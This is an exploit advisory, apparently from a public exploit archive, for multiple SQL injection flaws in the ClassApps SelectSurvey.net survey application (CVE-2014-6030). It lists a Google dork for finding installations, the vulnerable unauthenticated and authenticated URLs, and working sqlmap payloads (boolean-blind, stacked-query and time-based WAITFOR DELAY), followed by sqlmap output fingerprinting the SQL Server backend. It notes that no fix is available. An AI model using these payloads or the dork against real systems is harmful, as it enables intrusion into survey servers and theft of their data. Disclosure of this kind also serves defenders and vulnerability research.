ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities

2014-09-20 10:48:51

##########
# Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net
# Google Dork: intitle:SelectSurvey
# Date: Sep 03 2014
# Vendor Homepage: https://www.classapps.com/
# Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp
# Version: 4.124.004
# Tested on: Windows 2008 R2/SQL Server 2008
# CVE: 2014-6030
##########

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Vulnerabilities
==========
Unauthenticated:
http[s]://<host>/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]

Authenticated:
http[s]://<host>/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
Jun 28 2012 08:36:30
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---

Fixes

No fixes

In order to submit a new fix you need to be registered.